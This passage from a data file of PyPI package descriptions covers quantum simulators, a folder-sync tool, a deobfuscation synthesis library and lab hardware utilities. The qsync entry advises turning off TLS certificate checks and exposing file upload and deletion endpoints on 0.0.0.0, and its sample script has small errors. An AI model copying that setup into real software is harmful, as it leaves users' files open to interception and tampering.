information.>>>fromqsurface.mainimportinitialize,run>>>code,decoder=initialize((6,6),\"toric\",\"mwpm\",enabled_errors=[\"pauli\"],plotting=True,initial_states=(0,0))>>>run(code,decoder,error_rates={\"p_bitflip\":0.1,\"p_phaseflip\":0.1},decode_initial=False)Plotting will be performed on a 3D axis if faulty measurements are enabled.>>>code,decoder=initialize((3,3),\"toric\",\"mwpm\",enabled_errors=[\"pauli\"],faulty_measurements=True,plotting=True,initial_states=(0,0))>>>run(code,decoder,error_rates={\"p_bitflip\":0.05,\"p_bitflip_plaq\":0.05},decode_initial=False)In IPython, inline images are created for each iteration of the plot, which can be tested in theexample notebook.Command line interfaceSimulations can also be initiated from the command line$python-mqsurface-epauli-Dmwpm-Ctoricsimulation--p_bitflip0.1-n10{'no_error':8}For more information on command line interface:$python-mqsurface-h\nusage:qsurface\n...This project is proudly funded by theUnitary Fund."} +{"package": "qsvin", "pacakge-description": "No description available on PyPI."} +{"package": "qs_vod_metadata", "pacakge-description": "This project contains a library and tools for manipulating and\ngenerating metadata files that conform to the CableLabs VOD Metada 1.1\nspecification"} +{"package": "qsy", "pacakge-description": "qsyA quantum computer state vector/stabilizer circuit simulator and assembly\nlanguage.Table of ContentsInstallationqsyExampleqsyASMUsageExampleSyntaxOperationsAdjoint OperationList of OperationsRegistersMeasurementEfficient simulation of stabilizer circuitsLicenseInstallation$ pip install qsyThis will install the Python library qsy and command-line tool qsyasm.qsyqsy is a Python library for simulating quantum circuits.ExampleThe following code creates an entangled state and prints its state vector in\nDirac notation.fromqsyimportQuantumRegister,gatesqr=QuantumRegister(2)qr.apply_gate(gates.H,0)qr.apply_gate(gates.CX,0,1)print(qr.to_dirac())The output will be:+0.70711|00> +0.70711|11>qsyASMqsyASM is a quantum assembly language acting as front-end for qsy. It allows\nyou to quickly write and debug quantum programs. 
It also allows for efficient\nsimulation of stabilizer circuits using thechpback-end.Usageusage: qsyasm [-h] [-V] [-v] [-t] [-b B] [-s SHOTS] [--ignore-print-warning]\n [--skip-zero-amplitudes]\n filename\n\nqsyasm assembly runner\n\npositional arguments:\n filename qsyasm file to execute\n\noptional arguments:\n -h, --help show this help message and exit\n -V, --version show program's version number and exit\n -v, --verbose verbose output\n -t, --time time program execution\n -b B, --backend B simulator back-end to use: chp or statevector\n (default: statevector)\n -s SHOTS, --shots SHOTS\n amount of shots to run\n --ignore-print-warning\n ignore register too large to print warning\n --skip-zero-amplitudes\n don't print states with an amplitude of 0ExampleThe following qsyASM program creates an entangled state and measures to a\nclassical register:qreg[2]qcreg[2]chq[0]cxq[0],q[1]measq,cRunning it:$ qsyasm examples/qsyasm/bell.qs\nq[2]: +1|11>\n +0 | 00\n +0 | 01\n +0 | 10\n +1 | 11\nc[2]: 11Or running it a number of times:$ qsyasm examples/qsyasm/bell.qs --shots=1024\nq[2]: +1|00>\n +1 | 00\n +0 | 01\n +0 | 10\n +0 | 11\nc[2]: {'11': 550, '00': 474}More examples such as the quantum phase estimation algorithm can be found in theexamples/qsyasmfolder.SyntaxThe structure of a qsyASM program consists of a list of instructions. An\ninstruction is defined as an operation followed by its arguments.OperationsThe instructioncxq[0],q[1]applies a CNOT operation with control qubitq[0]and target qubitq[1].\nSome operations take an angle (in radians) as argument. The parameterized operationrz(pi/2)q[0]rotatesq[0]\u03c0/2 radians around the Z axis. Expressions are allowed in\nparameterized operations. Expression operators supported are+,-,*,/and**(power). The variablepiis available for convenience.Adjoint OperationTo apply the adjoint of a gate, theadjkeyword is available. For example, to\napply the adjoint of S (S dagger):adjsq[0]List of OperationsGateqsyASM operationPauli Ii targetPauli Xx targetPauli Yy targetPauli Zz targetHadamardh targetSs targetTt targetRxrx(angle) targetRyry(angle) targetRzrz(angle) targetCNOTcx control, targetCZcz control, targetCRxcrx(angle) control, targetCRycry(angle) control, targetCRzcrz(angle) control, targetToffoliccx controlA, controlB, targetRegistersDefining a quantum register is done with theqregoperation. The instructionqreg[5]qdefines a 5 qubit quantum register namedq. Likewise, a classical register (useful for measuring) can be defined ascreg[5]cQubits in a quantum register are initiated to |0\u27e9, and bits in a classical register to 0.MeasurementMeasurement can be done on individual qubits, or a complete quantum state. The programqreg[5]qcreg[1]chq[0]measq[0],c[0]measuresq[0]toc[0], collapsing the state and storing the result inc[0]. The measurement result can be ignored by only passing one argument tomeas:measq[0]To measure a complete quantum state you can pass the whole quantum and classical register:qreg[3]qcreg[3]c; 3 qubit GHZ statehq[0]cxq[0],q[1]cxq[0],q[2]measq,ccollapsing the quantum registerqand storing the measurement result inc. This only works when the quantum register and classical register are equal in size.Efficient simulation of stabilizer circuitsCircuits consisting only of CNOT, H, S, X, Y, Z and CZ gates can be efficiently\nsimulated with the CHP back-end. 
Using any other operations with the CHP\nback-end will result in an error.For example, we can simulate a partially entangled 750 qubit state:$ qsyasm examples/qsyasm/750_qubits.qs --backend=chp\nc[750]: 000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000This back-end is an implementation of the CHP simulator described by\nScott Aaronson and Daniel Gottesman in their paper \"Improved Simulation of Stabilizer Circuits\"\n(arXiv:quant-ph/0406196).LicenseThis project is licensed under the MIT License. See theLICENSEfile\nfor the full license."} +{"package": "qsymm", "pacakge-description": "QsymmSymmetry finder and symmetric Hamiltonian generatorqsymmis anopen-sourcePython library that makes symmetry analysis simple.It automatically generates model Hamiltonians from symmetry constraints\nand finds the full symmetry group of your Hamiltonian.Check out theintroductory tutorialto see examples of how to useqsymm.Implemented algorithmsThe two core concepts inqsymmareHamiltonian families(Hamiltonians that may depend on\nfree parameters) andsymmetries. We provide powerful classes to handle these:Modelis used to store symbolic Hamiltonians that may depend on momenta and other free parameters.\nWe usesympyfor symbolic manipulation, but our implementation utilizesnumpyarrays for\nefficient calculations with matrix valued functions.PointGroupElementandContinuousGroupGeneratorare used to store symmetry operators.\nBesides the ability to combine symmetries, they can also be applied to aModelto transform it.We implement algorithms that form a two-way connection between Hamiltonian families and symmetries.Symmetry finding is handled bysymmetries, it takes aModelas input and finds all of its symmetries,\nincluding conserved quantities, time reversal, particle-hole, and spatial rotation symmetries.\nSee thesymmetry finder tutorialand thekekule tutorialfor detailed examples.continuum_hamiltonianandbloch_familyare used to generatek.por lattice Hamiltonians\nfrom symmetry constraints. See thek-dot-p generator tutorial,\ntheBloch generator tutorialand thekekule tutorialfor detailed examples.Installationqsymmworks with Python 3.5 and is available on PyPI:pipinstallqsymmSome of the example notebooks also requireKwant.DocumentationQsymm's documentation is hosted onRead the DocsCitingCheck outCITING.mdfor instructions on how to cite Qsymm in your publications.Developmentqsymmis onGitlab, visit there if you would\nlike to to contribute, report issues, or get the latest development version."} +{"package": "qsync", "pacakge-description": "QSYNCintroductionsync_module is the simplest way to set-up a one/two ways syncronisations between folders and even between two distinct devices, from a single python script ! 
just use it like so :fromqsyncimportSyncIniterfromsysimportargvfrommultiprocessingimportfreeze_supportimportargparsefromqsyncimportserverdefmain():# nothing usefull, just parsing command line argsparser=argparse.ArgumentParser(description=\"\")parser.add_argument('sync_src',type=str,help='sync source directory')parser.add_argument('sync_dst',type=str,help='sync destination directory')parser.add_argument('-bd',action='store_true',help='bi directionnal mode')parser.add_argument('--force-id',type=str,help='force a specific id associated to the sync process (necessary to acces via http)')parser.add_argument('--remote',type=str,help='open sync server, specify destination ip')parser.add_argument('--loop-time',type=float,help='adjust the time between two sync (each use has it\\'s own optimal inter-loop time to avoid sync errors'))args=parser.parse_args()sync_src=args.sync_src.replace(\"\\\\\",\"/\")sync_dst=args.sync_dst.replace(\"\\\\\",\"/\")bi_d=args.bdifargs.remote:remote_ip=args.remoteremote=Trueelse:remote_ip=\"\"remote=Falseforce_id=args.force_idloop_time=args.loop_time# sync_src and sync_dst must be two strings containing two path# bi_directionnal is an optionnal boolean, default set to False# remote is an optionnal boolean, set to True if the sync_dst path is on a remote location# force_id let you specify the sync id, usefull in case of remote and/or want to keep a sync state after shutdown# loop_time let you adjust the time between two sync (each use has it\\'s own optimal inter-loop time to avoid sync errors)s=SyncIniter(sync_src,sync_dst,bi_directionnal=bi_d,remote=remote,force_id=force_id,remote_ip=remote_ip,loop_time=loop_time)s.start_sync()print(f\"started to sync, bi directionnal mode :{bi_d}, remote:{remote}\")print(f\"\\n\\nSYNC ID :\\n{s.sync_id}\\n\\n\")# start the server if the other side is on a remote machine if not already runningifremote:try:get(\"https://127.0.0.1:2121/is_running\",timeout=1,verify=False)exceptTimeoutError:server.app.run(host=\"0.0.0.0\",port=2121,ssl_context='adhoc')if__name__==\"__main__\":freeze_support()main()A cli is also available with this module :usage: __main__.py [-h] [-bd] [--force-id FORCE_ID] [--remote REMOTE] [--loop-time LOOP_TIME]\n sync_src sync_dst\n\npositional arguments:\n sync_src sync source directory\n sync_dst sync destination directory\n\noptional arguments:\n -h, --help show this help message and exit\n -bd bi directionnal mode\n --force-id FORCE_ID force a specific id associated to the sync process (necessary to acces via\n http)\n --remote REMOTE open sync server, specify destination ip\n --loop-time LOOP_TIME\n adjust the time between two sync (each use has it's own optimal inter-loop\n time to avoid sync errors)(remote sync does not need to be in real time, each device will store changes and wait the other when they can't connect to each other)Example :C:\\> python -m qsync \"D:\\test_src\" \"C:\\Users\\USER\\Documents\\test_dst\" -bd --remote \"192.168.0.64\" --force-id \"0x1bfdc4f5e421fe563476d2441980349d79c32ccae555134b3eb7a4b62f68f1e66aa574f933289edbc6043b25977b69f2c921961fd60596e4281464fc84f76d3c16df24db5c15fcf98ab071aaf6711da44efcc0024f37a0213b98e42739eb5398cf760a307149cfb58dfa5a\" --loop-time 10Errors :InvalidPathErrorraised in start_sync() when a path don't existshow qsync server works in a remote context :(Sync does not need to be in real time, each device will store changes and wait the other when they can't connect to each other)Specifications :The qsync sync server is an http server, to encrypt data it uses 
on-the-fly certificates.\n\nBecause of these certificates, you must force whatever client you use not to verify certificates; for example, qsync uses requests.get(< args >, verify=False).\n\nThis server enables a great range of uses of qsync, from mobile-to-PC folder sync to multiple-PC sync.\n\nThe sync id is a hexadecimal representation of a 256-digit-long number and must be present on any http request, so the two sync ends must share this id. Once you have this id, to start the other sync process you need to use the --force-id FORCE_ID optional argument, or place it in your script as an optional argument of the SyncIniter class :\n\nSyncIniter(< args >, remote=True, force_id=force_id, remote_ip=remote_ip)\n\nHow does it synchronize :\n\nThe main infinite loop makes two requests :\n\n\"https://{self.sRemoteIP}:2121/remote_map\" to try to synchronize the folder maps between the two devices\n\"https://{self.sRemoteIP}:2121/sync_map\" to ask the other device what's new, which triggers multiple requests from the other device\n\nThe server has 7 URLs :\n\n/is_running, to check if the server is already running\n/sync_map?sync_id=..., to trigger many requests that will apply pending changes on your filesystem\n/remote_map?sync_id=..., returns a JSON response containing the current filesystem map\n/get_file?sync_id=...&full_path=..., lets you download a specific file. Full_path is the full path to get the file from the other side's filesystem (server side).\n/upload_file?sync_id=...&full_path=..., POST only. Uploads a specific file. Full_path is the full path to upload the file to on the other side's filesystem (server side).\n/remove?sync_id=...&full_path=..., deletes something, file or folder (server side).\n/mkdir?sync_id=...&full_path=..., creates a folder (server side). Full_path is the full path to create the folder on the other side's filesystem (server side).\n\nThe server makes sure each request doesn't try to download/modify... anything outside the root folder of your sync. If anything wrong is attempted, an explicit error message is returned as the response. Each uploaded file's name is also checked."} +{"package": "qsync-control", "pacakge-description": "A Python library for operating QMotion blinds controlled by a QSync device on the local network. The program is written in Python 3. Network protocol dissection can be found in the comments within the qsync_control.py file. Protocol details are inferred from Wireshark monitoring of the network traffic between the QMotion QSync iPhone app and the QSync device.\n\nUsage examples can be found at: https://github.com/exitexit/qsync-control"} +{"package": "qsynthesis", "pacakge-description": "Qsynthesis\n\nQSynthesis is a Python3 API to perform I/O based program synthesis\nof bitvector expressions.
It aims at facilitating code deobfuscation.\nThe algorithm is greybox approach combining both a blackbox I/O based\nsynthesis and a whitebox AST search to synthesize sub-expressions(if\nthe root node cannot be synthesized).This algorithm as originaly been described at the BAR academic workshop:QSynth: A Program Synthesis based Approach for Binary Code Deobfuscation(benchmark used are available:here)The code has been release as part of the following Black Hat talk:Greybox Program Synthesis: A New Approach to Attack Dataflow ObfuscationDisclaimer: This framework is experimental, and shall only be used for experimentation purposes.\nIt mainly aims at stimulating research in this area.DocumentationThe installation, examples, and API documentation is available on the dedicated documentation:DocumentationFunctionalitiesThe core synthesis is based onTritonsymbolic engine on which is built\nthe whole framework. It provides the following functionalities:synthesis of bitvector expressionsability to check through SMT the semantic equivalence of synthesized expressionsability to synthesize constants(if the expression encode a constant)ability to improve oracles (pre-computed tables) overtime through a learning mechanismability to reassemble synthesized expression back to assemblyability to serve oracles through a REST API to facilitate the synthesis usagean IDA plugin providing an integration of the synthesisQuick startInstallationIn order to work Triton first has to be installed:install documentation.\nTriton does not automatically install itself in a virtualenv, copy it in your venv or use --system-site-packages when configuring your venv.Then:$ git clone https://github.com/quarkslab/qsynthesis.git\n$ cd qsynthesis\n$ pip3 install '.[all]'The[all]will installed all dependencies(see the documentation for a light install).Table generationThe synthesis algorithm requires generating oracle tables derived from a grammar(a\nset of variables and operators). Qsynthesis installation provides the utilityqsynthesis-table-managerenabling manipulating tables. The following command generate a table with 3 variables of 64 bits,\n5 operators using a vector of 16 inputs. 
We limit the generation to 5 million entries.$ qsynthesis-table-manager generate -bs 64 --var-num 3 --input-num 16 --random-level 5 --ops AND,NEG,MUL,XOR,NOT --watchdog 80 --limit 5000000 my_oracle_table\nGenerate Table\nWatchdog value: 80.0\nDepth 2 (size:3) (Time:0m0.23120s)\nDepth 3 (size:21) (Time:0m0.23198s)\nDepth 4 (size:574) (Time:0m0.26068s)\nDepth 5 (size:400858) (Time:0m21.23231s)\nThreshold reached, generation interrupted\nStop required\nDepth 5 (size:5000002) (Time:4m52.56009s) [RAM:9.52Gb]Note: The generation process is RAM consuming the--watchdogenables setting a\npercentage of the RAM above which the generation is interrupted.Synthesizing a bitvector expressionWe then can try simplifying a seemingly obfuscated expression with:fromqsynthesisimportSimpleSymExec,TopDownSynthesizer,InputOutputOracleLevelDBblob=b'UH\\x89\\xe5H\\x89}\\xf8H\\x89u\\xf0H\\x89U\\xe8H\\x89M\\xe0L\\x89E\\xd8H\\x8bE'\\b'\\xe0H\\xf7\\xd0H\\x0bE\\xf8H\\x89\\xc2H\\x8bE\\xe0H\\x01\\xd0H\\x8dH\\x01H\\x8b'\\b'E\\xf8H+E\\xe8H\\x8bU\\xe8H\\xf7\\xd2H\\x0bU\\xf8H\\x01\\xd2H)\\xd0H\\x83\\xe8'\\b'\\x02H!\\xc1H\\x8bE\\xe0H\\xf7\\xd0H\\x0bE\\xf8H\\x89\\xc2H\\x8bE\\xe0H\\x01\\xd0'\\b'H\\x8dp\\x01H\\x8bE\\xf8H+E\\xe8H\\x8bU\\xe8H\\xf7\\xd2H\\x0bU\\xf8H\\x01\\xd2'\\b'H)\\xd0H\\x83\\xe8\\x02H\\t\\xf0H)\\xc1H\\x89\\xc8H\\x83\\xe8\\x01]\\xc3'# Perform symbolic execution of the instructionssymexec=SimpleSymExec(\"x86_64\")symexec.initialize_register('rip',0x40B160)# arbitrary addresssymexec.initialize_register('rsp',0x800000)# arbitrary stacksymexec.execute_blob(blob,0x40B160)rax=symexec.get_register_ast(\"rax\")# retrieve rax register expressions# Load lookup tablesltm=InputOutputOracleLevelDB.load(\"my_oracle_table\")# Perform Synthesis of the expressionsynthesizer=TopDownSynthesizer(ltm)synt_rax,simp=synthesizer.synthesize(rax)print(f\"expression:{rax.pp_str}\")print(f\"synthesized expression:{synt_rax.pp_str}[{simp}]\")Limitationssynthesis accuracy limited by pre-computed tables exhaustivnesstable generation limited by RAM consumptionreassembly cannot involve memory variable, destination is necessarily a register and\narchitecture depends on llvmlite(thus mostly x86_64)the code references trace-based synthesis which is disabled(as the underlying\nframework is not yet open-source)AuthorsRobin David (@RobinDavid), QuarkslabContributorsHuge thanks to contributors to this research:Luigi ConiglioJonathan Salwan"} +{"package": "qsys", "pacakge-description": "Python QSYS QRC WrapperControl QSC QSYS Core devices with pythonToDoFlaskify...Document, document, documentUseFor each QSC Core on the network instantiate a \"Core\" classWhen adding control objects they will \"cast\" themselves to the parent core classThe parent Core class instance is required as keyword arg \"parent\" when creating control objects#!/usr/bin/python3importtimefromqsys.classesimportCore,Control,ChangeGroup#returns epoch timefromqsys.helpersimportepochdefmain():#See qsys.py for parameters in Core class#The initiail EngineStatus response parameters from the device will get added to Core.__dict__#You can pass \"port\" as well, but it defaults to 1710myCore=Core(Name='myCore',User='',Password='',ip='192.168.61.2')#Open the socket,creates \"listen\" and \"keepalive\" threadsmyCore.start()#ValueType can be a list of potential value types [int,float] or a single type \"str\" etc#This object is assumed to be a \"gain\" control object, so we can pass [int,float]gainControlObject=Control(parent=myCore,Name='namedControlInQsysDesigner',ValueType=[int,float])#To 
constantly monitor the state of your object use a ChangeGroup#You need to a ChangeGroup instance to add control objects and set polling rates#Parameters that are capitalize are that way because of the QRC parameter protocol#Id in this case is just the name of the ChangeGroupmyChangeGroup=ChangeGroup(parent=myCore,Id='myChangeGroup')myChangeGroup.AddControl(gainControlObject)#Allow the socket time to connect and parse the initial responsestime.sleep(2)#Set the change group auto poll rate#This rate is fast, your mileage may varymyChangeGroup.AutoPoll(Rate=0.1)#Value = value to set object to#TransId = QRC id parameter for transaction IDgainControlObject.set(Value=10,TransId=epoch())whileTrue:print(gainControlObject.state)time.sleep(1)if__name__=='__main__':main()NotesIn development, versions will change rapidly. This version doesn't do much yet.. stand byReferenceshttps://q-syshelp.qsc.com/Content/External_Control/Q-Sys_Remote_Control/QRC.htm"} +{"package": "qt", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qt3rfsynthcontrol", "pacakge-description": "Controller for Windfreak SynthHD v2 RF GeneratorHelper code to controlWindfreak's SynthHD RF generator.Installationpip install qt3rfsynthcontrolUsageDetermine the portimportqt3rfsynthcontrolqt3rfsynthcontrol.discover_devices()Will return a list of ports and information about devices connected to those ports.\nFor example[['COM3','Intel(R) Active Management Technology - SOL (COM3)','PCI\\\\VEN_8086&DEV_43E3&SUBSYS_0A541028&REV_11\\\\3&11583659&1&B3'],['COM5','USB Serial Device (COM5)','USB VID:PID=0483:A3E5 SER=206A36705430 LOCATION=1-2:x.0'],['COM6','USB Serial Device (COM6)','USB VID:PID=04D8:000A SER= LOCATION=1-8:x.0'],['COM7','USB Serial Device (COM7)','USB VID:PID=239A:8014 SER=3B0D07C25831555020312E341A3214FF LOCATION=1-6:x.0']]It is certainly not obvious to which USB port the Windfreak is connected. However,\nusing the Windows Task Manager, as well as trial and error, should eventually\nreveal the correct serial port to use.Connection to SynthHDrf_synth=qt3rfsynthcontrol.QT3SynthHD('COM5')Hardware Inforf_synth.hw_info()Current Signal Statusrf_synth.current_status()Set Fixed Frequencychannel_A=0channel_B=1rf_synth.set_channel_fixed_output(channel_A,power=-5.0,frequency=2870e6)Set Up For Frequency ScanFrequency scan can either be triggered externally (using the Quantum Composer\nSapphire pulser, or other), or can run independent of any external control.channel_A=0channel_B=1rf_synth.set_frequency_sweep(channel_A,power=-5.0,frequency_low=2820e6,frequency_high=2920e6,n_steps=101,trigger_mode='single frequency step',frequency_sample_time=0.100)See the function's documentation for further detailshelp(rf_synth.set_frequency_sweep)Turn RF ON/OFFThe RF generation can be turned on and off withchannel_A=0channel_B=1rf_synth.rf_on(channel_A)rf_sythh.rf_off(channel_A)Windfreak.SynthHDIf you wish to use thewindfreak-pythonSynthHD object instance directly, you\ncan obtain it from the propertySynthHD. Usage ofwindfreak-python is documented here.windfreak_synthhd=rf_synth.SynthHD()print(windfreak_synthhd[0].power)print(windfreak_synthhd[0].frequency)The documentation is a little sparse, however. 
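For instance, a write through the same wrapped object might look like the following minimal sketch; the channel indexing and the power/frequency/enable property names mirror the read example above and the windfreak-python documentation, but treat them as assumptions to verify against your installed version:\n\nchannel_A = 0\nsynth = rf_synth.SynthHD()            # underlying windfreak-python SynthHD instance\nsynth[channel_A].frequency = 2.87e9   # output frequency in Hz\nsynth[channel_A].power = -5.0         # output power in dBm\nsynth[channel_A].enable = True        # switch the channel output on\n\n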
The full set of commands are found inthe codethe programming manualIt can take a little effort to match the python API with the description in the manual as\nsome of thewindfreak-pythonAPI functions do not exactly match the function name in the manual.\nFor examplesweep_singleinwindfreak-pythonis calledsweep_runorrun_sweepin the programming manual.LICENSELICENCE"} +{"package": "qt3utils", "pacakge-description": "Utility Classes and Functions for the QT3 LabThis package provides a number of tools and fully-packaged programs for usage\nin the Quantum Technologies Teaching and Test-Bed (QT3) lab at the University of Washington.The QT3 lab confocal microscope utilizes the following hardware to perform\nvarious spin-control experiments on quantum systems, such as NV centers in diamond:TTL pulsersQuantum Composer SapphireSpin Core PulseBlasterExcelitas SPCM for photon detectionNI-DAQ card (PCIx 6363) for data acquisition and controlJena System's Piezo Actuator Stage Control Amplifier[Future] spectrometerThe code in this package facilitates usages of these devices to perform\nexperiments.SetupPrerequisitesThe utilities in this package depend on publicly available Python packages found\non PyPI and drivers built by National Instruments for DAQmx and\nSpinCore for the PulseBlaster. These libraries must be installed separately.National Instruments DAQmxdriver downloadsSpinCore's PulseBlasterspinAPI driverInstallationOnce the prerequisite packages have been installed, qt3utils can be installed from pip.Normal Installationpip install qt3utilsTheqt3utilspackage depends on a handful of otherqt3 packagesand will be installed for you by default.\nAdditional information may also befound here.Update Tk/TclUpgrading Tcl/Tk via Anaconda overcomes some GUI bugs on Mac OS Sonomaconda install 'tk>=8.6.13'UsageThis package provides GUI applications and a Python API for controlling the hardware and running experiments.For instructions on using the python API,\nthe simplest way to get started is to see one of theexampleJupyter notebooks.The following notebooks demonstrate usage of their respective experiment classes and\nthe necessary hardware control objects for those experimentsCWODMRPulsed ODMRRabi OscillationsRamsey(similar usage for spin/Hahn echo and dynamical decoupling)Additionally, there are two notebooks that demonstrate some basic hardware testsPulse Blaster TestsMW Switch TestsMost classes and methods contain docstrings that describe functionality, which you can\ndiscover through the python help() function.Details of how the experiment classes work and how you can modify\nthem are found inExperimentsDoc.mdHelp toautomatically generate documentationwould be appreciated.ApplicationsQT3 OscilloscopeThe console programqt3scopecomes with this package. It allows you to run\na simple program from the command-line that reads the count rate on a particular\ndigital input terminal on the NI DAQ. Further development may allow it to\ndisplay count rates from other hardware.It can be from the command line / terminal> qt3scopeAfterpip install, there will be an executible file in your python environment. 
You\nshould be able to create a softlink to that executable to a desktop or task bar icon, allowing\nto launch the program from a mouse click.Starting in version 1.0.3, graphical dropdown menus and configuration windows\nwill allow users to configure various hardware options.YAML ConfigurationData Acquisition hardware supported by QT3Scope can also be configured by selecting a YAML file.\nThe YAML file must contain a specific structure and names as shown below.Default NIDAQ Edge Counter YAML configuration:QT3Scope:DAQController:import_path:qt3utils.applications.controllers.nidaqedgecounterclass_name:QT3ScopeNIDAQEdgeCounterControllerconfigure:daq_name:Dev1# NI DAQ Device Namesignal_terminal:PFI0# NI DAQ terminal connected to input digital TTL signalclock_terminal:# Specifies the digital input terminal to the NI DAQ to use for a clock. If left blank, interprets as None or NULLclock_rate:100000# NI DAQ clock rate in Hznum_data_samples_per_batch:1000read_write_timeout:10# timeout in seconds for read/write operationssignal_counter:ctr2# NI DAQ counter to use for counting the input signal, e.g. ctr0, ctr1, ctr2, or ctr3Default Random Data Generator configuration:QT3Scope:DAQController:import_path:qt3utils.applications.controllers.random_data_generatorclass_name:QT3ScopeRandomDataControllerconfigure:simulate_single_light_source:Falsenum_data_samples_per_batch:10default_offset:100signal_noise_amp:0.5All hardware controllers built for QT3Scope have a default\nconfiguration YAML file, which are found insrc/qt3utils/applications/controllers.QT3 Confocal ScanThe console programqt3scanperforms a 2D (x,y) scan using a data acquisition\ncontroller object and a position controller object. The default controllers use\nan NIDAQ device that counts TTL edges (typically from an SPCM) and sets\nanalog voltage values on a Jena system piezo actuator.> qt3scanSimilar toqt3scope, the supported hardware can be configured via GUI or YAML file.All hardware controllers that are built for QT3Scope have a default\nconfiguration YAML file, which will be found insrc/qt3utils/applications/controllers.Default NIDAQ Edge Counter YAML configuration:QT3Scan:DAQController:import_path:qt3utils.applications.controllers.nidaqedgecounterclass_name:QT3ScanNIDAQEdgeCounterControllerconfigure:daq_name:Dev1# NI DAQ Device Namesignal_terminal:PFI0# NI DAQ terminal connected to input digital TTL signalclock_terminal:# Specifies the digital input terminal to the NI DAQ to use for a clock. If left blank, interprets as None or NULLclock_rate:100000# NI DAQ clock rate in Hznum_data_samples_per_batch:250read_write_timeout:10# timeout in seconds for read/write operationssignal_counter:ctr2# NI DAQ counter to use for counting the input signal, e.g. 
ctr0, ctr1, ctr2, or ctr3PositionController:import_path:qt3utils.applications.controllers.nidaqpiezocontrollerclass_name:QT3ScanNIDAQPositionControllerconfigure:daq_name:Dev1# NI DAQ Device Namewrite_channels:ao0,ao1,ao2# NI DAQ analog output channels to use for writing positionread_channels:ai0,ai1,ai2# NI DAQ analog input channels to use for reading positionscale_microns_per_volt:8# conversion factor from volts to microns, can also supply a list [8,8,8] or [6,4.2,5]zero_microns_volt_offset:0# the voltage value that defines the position 0,0,0, can also supply a list [0,0,0] or [5,5,5]minimum_allowed_position:0# micronsmaximum_allowed_position:80# micronssettling_time_in_seconds:0.001Default Random Data Generator configuration:QT3Scan:PositionController:import_path:qt3utils.applications.controllers.random_data_generatorclass_name:QT3ScanDummyPositionControllerconfigure:maximum_allowed_position:80minimum_allowed_position:0DAQController:import_path:qt3utils.applications.controllers.random_data_generatorclass_name:QT3ScanRandomDataControllerconfigure:simulate_single_light_source:Truenum_data_samples_per_batch:10default_offset:100signal_noise_amp:0.1QT3 Piezo ControllerThe console programqt3piezocomes installed via the 'nipiezojenapy' package, and may be launched from the command line.> qt3piezoThis application can only be configured via command line options at this time.\nThenipiezojenapypython package should probably be moved intoqt3utils.QT3Scope / QT3Scan Hardware DevelopmentFollow these instructions in order to add new hardware support toqt3scopeorqt3scan.For each application, you'll need to build a Python classes that adheres to each application's interfaces.QT3ScopeBuild a class that adheres toQT3ScopeDAQControllerInterfaceas defined insrc/qt3utils/applications/qt3scope/interface.py. There are a number of methods\nthat you must construct. Two examples areQT3ScopeRandomDataControllerandQT3ScopeNIDAQEdgeCounterController.\nIn addition to controlling hardware and returning data, they must also supply a way to configure the object via\nPython dictionary (configuremethod) and graphically (configure_viewmethod).Create a YAML file with a default configuration, similar to that found inrandom_data_generator.yamlorAdd your new controller toSUPPORTED_CONTROLLERSfound inqt3scopeQT3ScanSimilar toqt3scopebut with a little more work.There are three controllers that are needed byqt3scan:Application Controller --QT3ScanApplicationControllerInterfaceDAQ Controller --QT3ScanDAQControllerInterfacePosition Controller --QT3ScanPositionControllerInterface1. Application ControllerCurrently there is onlyone implementation of the Application Controllerto support standard 2D (x,y) scans. It is used for scans using the NIDAQ Edge Counter\nController, NIDAQ Position Controller, Random Data Generator and Dummy\nPosition Controller.If you do not need any changes to the save function\nor special functionality to right-click on the scan image, then you can probably\nre-use this Application Controller.If you are developing something like the\nhyper-spectral image where each pixel in the 2D scan is based on a spectrum\nof counts over a range of wavelengths, you'll\nlikely want to build a new Application Controller. AQT3ScanHyperSpectralApplicationControllerclass would implement a\ndata view when a user right-clicks on the scan and would implement a function\nto save the full 3-dimensional data set.2. 
DAQ ControllerTo support new hardware that acquires data, build an implementation ofQT3ScanDAQControllerInterface.\nExamples areQT3ScanRandomDataController,\nandQT3ScanNIDAQEdgeCounterControllerCreate a new python module in insrc/qt3utils/applications/controllersfor your hardware controller.3. Position ControllerTo support a new Position Controller build an implementation ofQT3ScanPositionControllerInterface.\nExamples areQT3ScanDummyPositionController,\nandQT3ScanNIDAQPositionControllerCreate a new python module in insrc/qt3utils/applications/controllersfor your position controller.4. Default YAML fileCreate a default YAML file that configures your DAQ and Position Controllers. Place the YAML file insrc/qt3utils/applications/controllers5. Update QT3Scan.mainAdd your new controllers toqt3scan.main.pyGeneral Python DevelopmentIf you wish you make changes to qt3-utils (and hopefully merge those improvements into this repository) here are some brief instructions to get started. These instructions assume you are a\nmember of the QT3 development team and have permission to push branches to this repo. If you are not, you can\ninstead fork this repo into your own GitHub account, perform development and then issue a pull-request from\nyour forked repo to this repo through GitHub. Alternatively, reach out to a maintainer of this repo to be added as a developer.These are mostly general guidelines for software development and\ncould be followed for other projects.1. Create a development environmentUse Conda, venv or virtualenv with Python = 3.9.> conda create --name qt3utilsdev python=3.9As of this writing, we have primarily tested and used Python 3.9.\nReach out to a Maintainer to discuss moving to newer versions of\nPython if this is needed.2. Activate that environment> conda activate qt3utilsdev3. Clone this repository> git clone https://github.com/qt3uw/qt3-utils.git4. Install qt3-utils in \"editor\" mode> cd qt3-utils\n> pip install -e .Thepip install -e .command installs the package in editor mode.\nThis allows you to make changes to the source code and immediately\nsee the effects of those changes in a Python interpreter. It saves\nyou from having to call \"pip install\" each time you make a change and\nwant to test it.5. Create a new IssueIt's generally good practice to first create an Issue in this GitHub\nrepository which describes the problem that needs to be addressed.\nIt's also a good idea to be familiar with the current Issues that\nalready exist. The change you want to make may already be\nreported by another user. In that case, you could collaborate\nwith that person.6. Create a new branch for your work> git checkout -b X-add-my-fancy-new-featurewhere it's good practice to use X to refer to a specific Issue to fix\nin this repository.You should create a new branch only for a specific piece of new work\nthat will be added to this repository. It is highly discouraged to create\na separate branch for your microscope only and to use that branch\nto perform version control for Python scripts or 